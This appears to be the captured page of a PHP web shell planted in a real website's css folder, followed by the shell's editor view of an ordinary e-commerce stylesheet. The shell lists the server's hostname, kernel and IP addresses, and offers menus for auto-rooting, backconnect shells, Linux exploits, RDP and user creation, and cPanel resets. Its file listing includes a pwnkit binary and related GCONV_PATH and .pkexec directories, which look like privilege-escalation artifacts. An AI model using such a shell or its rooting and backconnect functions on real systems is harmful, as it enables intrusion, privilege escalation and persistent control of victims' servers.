Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 216.73.216.192
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Tata-Inc /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
comnon.css
12.41
KB
-rw-r--r--
ecommerce.css
10.17
KB
-rw-r--r--
index.css
1.8
KB
-rw-r--r--
login.css
1.76
KB
-rw-r--r--
main-style.css
0
B
-rw-r--r--
owl.carousel.min.css
3.27
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
single-product.css
1.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ecommerce.css
/* empty cart */ .empty-cart { height: 50vh; width: 100%; } .width-540 { max-width: 550px; margin: auto; width: 100%; } .empty-cart .title-h4 { text-transform: capitalize; font-weight: 400; } .empty-cart .comm-btn { display: block; padding: 9px 22px; text-transform: capitalize; font: 500 18px / 21px "Inter"; } /* empty cart end */ /* input coupon */ .input-coupon { width: 68%; } .input-coupon input { width: 100%; border: 1px solid #dee2e7; border-top-left-radius: 6px; border-bottom-left-radius: 6px; outline: none; padding: 10px; border-right: none; font: normal 15px / 18px "Inter"; } .apply-btn-input { font: normal 15px / 18px "Inter"; border: 1px solid #dee2e7; background: transparent; font-weight: 500; outline: none; padding: 10px 17px; border-top-right-radius: 4px; border-bottom-right-radius: 4px; color: var(--blue); } .comm-btnx { box-shadow: 0px 1px 2px 0px #38383814; font: 500 18px / 22px "Inter"; padding: 15px 20px; } /* input coupon end */ /* cart list */ .cart-img { background: #eeeeee; border-radius: 6px; padding: 12px; flex: 0 0 14%; max-height: 80px; margin-right: 1rem; } .cart-info-v1 { flex: 0 0 82%; } .call-qty { flex: 0 0 15%; } .cart-more-items { flex: 0 0 67%; } .qty-sl { justify-content: space-between; box-shadow: 0px 1px 2px 0px #38383814; border: 1px solid #dee2e7; border-radius: 6px; padding: 11px; } .dm-qty { width: 65%; } .dm-qty select { border: 0; cursor: pointer; appearance: none; width: 100%; } .icon-select-dp { position: absolute; top: 0px; right: 0; } .cart-info-v1 { gap: 7px; } .call-addmove .comm-btn { font: 500 13px / 15px "Inter"; padding: 0.41rem 0.6rem; } .remove-btn { color: #c10000; margin-right: 0.5rem; } .cart-items li:last-child .divider { display: none; } .make-cart { gap: 1.65%; } .items-collect { flex: 0 0 74.6%; } .make-earn { flex: 0 0 23.75%; } .dm-pd { padding: 17px 18px 20px; } /* cart list end */ .help-ul { max-width: 838px; width: 100%; gap: 5%; } .help-li { flex: 0 0 30%; } .img-cl { display: flex; align-items: center; justify-content: center; width: 48px; height: 48px; margin-right: 7px; background-color: #dee2e7; border-radius: 50%; } .help-li { display: flex; } .text-v1 h2 { color: #1c1c1c; } .cart-reco-pd { gap: 1.1%; } .cart-reco-pd .products-a { align-items: unset; } .cart-reco-pd .item-title h2 { padding: 0; } .cart-reco-pd .item-img { padding: 23px; } .cart-reco-pd .sell-btn { display: flex; padding: 0.5rem 0.9rem; align-items: center; gap: 5px; } /* filter section */ .search-wrap { margin: 1.5rem 0 3.5rem; } .all-products { gap: 1.5%; } .filter-wrap { flex: 0 0 20.5%; } .filter-products { flex: 0 0 78%; } .items-li .title-h6 { line-height: 36px; font-weight: 400; display: block; } .items-li:last-child .title-h6 { color: var(--blue); } .filter-heading { border-top: 1px solid #dee2e7; padding: 14px 0; cursor: pointer; } .move-aw { position: absolute; right: 3px; top: 14px; transition: transform ease-in-out 0.3s, -webkit-transform ease-in-out 0.3s; } .filter-heading.arrow-down .move-aw { -webkit-transform: rotate(180deg); transform: rotate(180deg); } .items-li [type="checkbox"] { padding: 0; height: initial; width: initial; margin-bottom: 0; display: none; cursor: pointer; } .items-li .radio-input, .items-li .chexbox-lb { position: relative; cursor: pointer; line-height: 36px; font-weight: 400; display: block; } .items-li .chexbox-lb:before { content: ""; -webkit-appearance: none; background-color: transparent; border: 2px solid #bdbdbd; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.05), inset 0px -15px 10px -12px rgba(0, 0, 0, 0.05); padding: 8px; display: inline-block; position: relative; vertical-align: middle; cursor: pointer; margin-right: 15px; border-radius: 5px; } .items-li [type="checkbox"]:checked + .chexbox-lb:after { content: ""; display: block; position: absolute; top: 11px; left: 8px; width: 6px; height: 14px; border: solid var(--blue); border-width: 0 2px 2px 0; transform: rotate(45deg); } .items-li input[type="radio"] { position: absolute; opacity: 0; } .items-li .radio-input { display: flex; width: 100%; } .items-li input[type="radio"] + .radio-input:before { content: ""; background: transparent; border-radius: 100%; border: 2px solid #979797; display: inline-block; width: 20px; height: 20px; position: relative; top: 8px; margin-right: 15px; cursor: pointer; text-align: center; transition: all 250ms ease; } .items-li input[type="radio"]:checked + .radio-input:before { background-color: var(--blue); border: 2px solid var(--blue); box-shadow: inset 0 0 0 2px var(--white); } .items-li input[type="radio"]:focus + .radio-input:before { outline: none; border-color: var(--blue); } /* filter section end */ .search-listname { padding: 18px; } .listing-pd { padding: 20px 18px; gap: 1rem; } .item-imgv1 { flex: 0 0 23%; } .rating-count { color: #ff9017; } .shipingv1 { color: #00b517; } .list-of-products { gap: 15px; } .all-ams { gap: 5px; line-height: 16px; } .c-ol { width: 6px; height: 6px; border-radius: 50%; display: block; background: #dee2e7; } .listing-pd a.title-h6 { color: var(--blue); font-weight: 500; display: inline-block; } .list-pagi { gap: 10px; } .pagi-select { border: 1px solid #dee2e7; border-radius: 6px; padding: 8px 45px 8px 10px; } .pagi-select .icon-select-dp { position: absolute; top: 7px; right: 7px; } .pagi-select select { border: 0; cursor: pointer; appearance: none; width: 100%; } /* pagi */ .pagination a { color: var(--black); font: 500 16px / 19px "Inter"; text-decoration: none; transition: background-color 0.3s; border: 1px solid #dee2e7; align-items: center; display: flex; justify-content: center; width: 44px; height: 40px; } .pagination a:first-child { border-top-left-radius: 6px; border-bottom-left-radius: 6px; } .pagination a:last-child { border-top-right-radius: 4px; border-bottom-right-radius: 4px; } .pagination a.active { background-color: #eff2f4; color: #8b96a5; } /* .pagination a:hover:not(.active) { background-color: #ddd; } */ /* pagi */ /* range slide */ /* range slider */ .slider-prcing-wrap { margin-top: 10px; } .price-input { width: 100%; display: flex; gap: 9px; margin: 20px 0 5px; } .price-input .field { display: flex; flex-direction: column; gap: 5px; width: 100%; /* height: 34px; align-items: center;*/ } .field span { font-weight: 500; font-size: 16px; } .field input { width: 100%; height: 100%; outline: none; font-size: 14px; margin-left: 5px; border-radius: 4px; text-align: center; border: 1px solid #dee2e7; min-height: 40px; -moz-appearance: textfield; } input[type="number"]::-webkit-outer-spin-button, input[type="number"]::-webkit-inner-spin-button { -webkit-appearance: none; } .price-input .separator { width: 130px; display: flex; font-size: 19px; align-items: center; justify-content: center; } .price-slider { height: 5px; position: relative; background: rgba(136, 136, 136, 0.08); border-radius: 5px; } .price-slider .price-progress { height: 100%; left: 25%; right: 25%; position: absolute; border-radius: 5px; background: rgba(29, 67, 122, 1); } .range-input { position: relative; } .range-input input { position: absolute; width: 100%; height: 5px; top: -5px; background: none; pointer-events: none; -webkit-appearance: none; -moz-appearance: none; } input[type="range"]::-webkit-slider-thumb { cursor: pointer; height: 20px; width: 20px; border-radius: 50%; background: var(--white); pointer-events: auto; -webkit-appearance: none; border: 1px solid var(--border); } input[type="range"]::-moz-range-thumb { cursor: pointer; height: 20px; width: 20px; border: none; border-radius: 50%; background: var(--white); pointer-events: auto; -moz-appearance: none; border: 1px solid var(--border); } /* range slider end */ /* slider products single */ .products-img-sing .item { overflow: hidden; } .products-tumbs-single .item { width: 57px; height: 55px; padding: 5px; overflow: hidden; border-radius: 4px; border: 1px solid var(--gray-300); background: var(--white); cursor: pointer; } .products-img-single .item img { width: 100%; } .products-tumbs-single .item img { width: 100%; height: 45px; } .products-img-single.owl-theme .owl-nav [class*="owl-"] { transition: all 0.3s ease; } .products-img-single.owl-theme .owl-nav [class*="owl-"].disabled:hover { background-color: #d6d6d6; } .products-tumbs-single.owl-theme, .products-img-single.owl-theme { position: relative; } .products-tumbs-single.owl-theme .owl-next, .products-tumbs-single.owl-theme .owl-prev { position: absolute; top: 0; color: #8b96a5 !important; font-size: 32px !important; background: var(--white) !important; display: inline-block; cursor: pointer; border: 1px solid var(--gray-300) !important; border-radius: 4px; width: 55px; height: 55px; } .products-tumbs-single.owl-theme .owl-nav button.disabled { opacity: 0.5; cursor: no-drop; } .products-tumbs-single.owl-theme .owl-prev { left: -56px; } .products-tumbs-single.owl-theme .owl-next { right: -56px; } .products-tumbs-single.owl-carousel.owl-drag .owl-item, .products-tumbs-single.owl-theme .owl-item { margin: 0 5px; } .products-tumbs-single.owl-theme .owl-stage-outer { margin: auto; } .mx-auto { margin: 0px auto; } .width-100-2 { width: calc(100% - 110px); } .products-tumbs-single.owl-carousel .owl-stage { width: 100% !important; display: flex; margin: auto !important; } /* products single*/
Close